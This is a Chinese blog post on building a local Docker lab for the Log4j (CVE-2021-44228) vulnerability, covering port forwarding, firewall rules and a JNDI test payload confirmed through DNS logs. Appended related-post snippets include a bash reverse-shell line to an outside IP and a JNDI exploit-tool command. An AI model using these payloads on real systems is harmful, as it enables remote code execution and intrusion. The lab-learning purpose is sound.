本地log4j靶场搭建复现

于 2025-04-17 15:52:01 发布
阅读量277 收藏 5
点赞数 3
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pyc769540636/article/details/147302159
版权

上篇文章我们已经成功在win11上安装了kali和docker,接下来我们来使用docker搭建一个log4j的靶场

1.拉取镜像 docker pull vulfocus/log4j2-rce-2021-12-09

2.下载好了以后看看镜像

启动镜像前先说一下,因为我们是win11上安装的kali,本机IP是192.168.11.85

然后这个机器又分出一个内网,网口是172.24.128.1,这个kali的IP是172.24.142.243

3.启动容器,设置端口转发

docker run -d -p <kali的IP>:xxxx:xxx   镜像名

这样执行后我们就可以在本机访问这个靶场了

但是现在这个靶场只能你自己访问,如果你想让你的同事和你一起玩这个靶场,那么继续往下看吧

4.设置一个端口转发规则,让访问192.168.11.85:8080的流量能够访问到172.24.142.243的38080端口,打开powershell以管理员身份运行

netsh interface portproxy add v4tov4 listenaddress=192.168.11.85 listenport=8080 connectaddress=172.24.142.243 connectport=38080

PS:netsh interface portproxy show all  这个命令可以查看当前所有的流量转发规则

5.设置防火墙规则,让局域网访问192.168.11.85:8080的流量能够过来

netsh advfirewall firewall add rule name="Allow_8080" dir=in action=allow protocol=TCP localport=8080

PS:如果你需要清理这个防火墙规则,请使用下面这个命令netsh advfirewall firewall delete rule name="规则名称" dir=in action=allow protocol=TCP localport=8080

6.现在开始复现log4j漏洞

先去dnslog平台生成一个地址

然后我们来构造payload,如果payload生效这个地方就会有解析记录,就证明存在log4j漏洞

${jndi:ldap://h0ijxl.dnslog.cn/exp} 

我们将这个payload进行url编码(请原谅我是个菜鸡我也不知道为啥要编码,但是直接使用不生效,别人使用url编码后攻击成功了)

回车后,我们去看dns解析记录

证明payload生效了

7.后续,在挖洞过程中,我们怎么知道这个地方存在漏洞呢

8.靶场搭建完后,我们要取消防火墙规则,

netsh advfirewall firewall delete rule name="Allow_8080" dir=in action=allow protocol=TCP localport=8080

关闭端口转发

netsh interface portproxy delete v4tov4 listenaddress=192.168.11.85 listenport=8080

关闭容器

apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1484
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocus的log4j2靶场docker,使用Kali系统进行复现实验。
vulhub靶场log4j2漏洞复现
最新发布
qq_45079558的博客
09-08 437
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号:CVE-2021-44228。
log4j2核弹级漏洞靶场复现(反弹shell)
m0_56773673的博客
01-04 4254
十分钟log4j2靶场漏洞复现!!!
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 2301
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
log4j2漏洞复现(附docker靶场环境)
告白的博客
02-15 4122
log4j2是log4j的升级版本,基于java的日志框架,在java项目中被大量的引用,当用户输入数据被记录于日志中,攻击者可通过构造特殊请求,造成JNDI注入,来触发log4j达到命令执行,JNID可访问的目录服务有lLDAP,JDBC,RMI,DNS,NIS,CORBA,JNDI是java提供的一个java命令和目录接口,可通过其调用定位资产和程序对象,
kali安装docker+log4j靶场搭建
zst6720的博客
06-29 520
出现报错,代表响应时间过长可以使用镜像站docker 加速器,替换原有地址就行“1.访问网址:http://xxx.xxx.xxx.xx:8983。3.安装docker,docker-compose。5刷新后dnslog返回结果,说明有log4j漏洞。1.添加docker的gpc秘钥,apt源。2.进入CVE-2021-44228目录。3.访问地址:dnslog。1.下载vulhub靶场。二、安装log4j靶场。一、安装docker。
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 8266
log4j漏洞原理和靶场复现
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 959
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞。
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3673
vulfocus靶场log4j2漏洞复现
Log4j2远程代码执行漏洞靶场复现(CVE-2021-44228)
没事我溜达
11-02 2627
logger在执行日志的时候,就会执行中间的表达式,如表达式是JNDI就会远程下载文件到本地并执行。
使用Docker搭建Java Web运行环境
loongshawn的博客
06-26 6625
使用docker搭建java web运行环境,及出现的问题。
(环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞
热门推荐
daxi0ng的博客
12-10 2万+
0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 0x01 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 0x02 影响范围 Apache Log4j 2.x <= 2.15.0-rc1 0x02环境搭建 1、创建一个新的maven项目,并导入Log4j的依赖包 <depe...
Docker 生产环境之日志 - 配置日志驱动程序
kikajack的博客
03-15 1万+
原文地址 Docker 提供多种日志驱动程序帮助你从运行中的容器和服务获取信息。 每个 Docker 守护进程都有一个默认的日志驱动程序,如果你没有将其配置为其他日志驱动程序,则每一个容器都会使用这个默认设置。 除了使用 Docker 自带的日志驱动程序外,你还可以实现和使用日志驱动程序插件(需要 Docker 17.05 或更高版本)。 1. 配置默认的日志驱动程序 要配置 Docke...
5种Docker日志最佳实践
博客
08-21 4473
原文:5 Docker Logging Best Practices 作者:Jeffrey Walker 翻译:Vincent 译者注:微服务和容器很好地结合了,但是它们的结合让日志记录也变成了一个难题。作者在本文描述了一些因素,在设置监控的时候是需要考虑的。以下为译文在过去的几年中,容器已经成为IT领域的一个重要话题,尤其是在DevOps领域。简单地说,当从一个环境迁移到另一个...
【BUG 记录】docker-compose搭建zookeeper 集群:log4j日志异常记录
小灰狼与大白兔的博客
01-09 6851
docker-compose 搭建zookeeper集群 Docker-compose部署单主机zookeeper集群 这篇博客介绍了我使用docker-compose 搭建zookeeper集群的过程,但是我发现zookeeper服务的守护进程的log4j的日志文件是输出到屏幕上的(终端),而没有重定向输入到指定文件里面,所以我有点好奇,就仔细看了一下,如果有理解错误的地方,还望大家批评指正。 我在服务器上部署三个zookeeper节点 服务器创建如下文件夹,便于后面容器zookeeper的指定文件夹(日
(环境搭建+复现)CVE-2019-17571 Apache Log4j SocketServer 反序列化漏洞
daxi0ng的博客
04-03 9724
1、【CVE编号】 CVE-2019-17571 2、【漏洞名称】 Apache Log4j SocketServer 反序列化漏洞 3、【靶标分类】 通用漏洞组件类靶标 4、【影响版本】 Log4j1.2.x<=1.2.17 5、【漏洞分类】 代码执行 6、【漏洞等级】 高 7、【漏洞简介】 Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个...
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场
yang1234567898的博客
04-18 3371
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
Log4J2 靶场漏洞复现
weixin_47019868的博客
12-18 1万+
北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228。相关地址NVD - CVE-2021-44228 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 在Kali系统
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值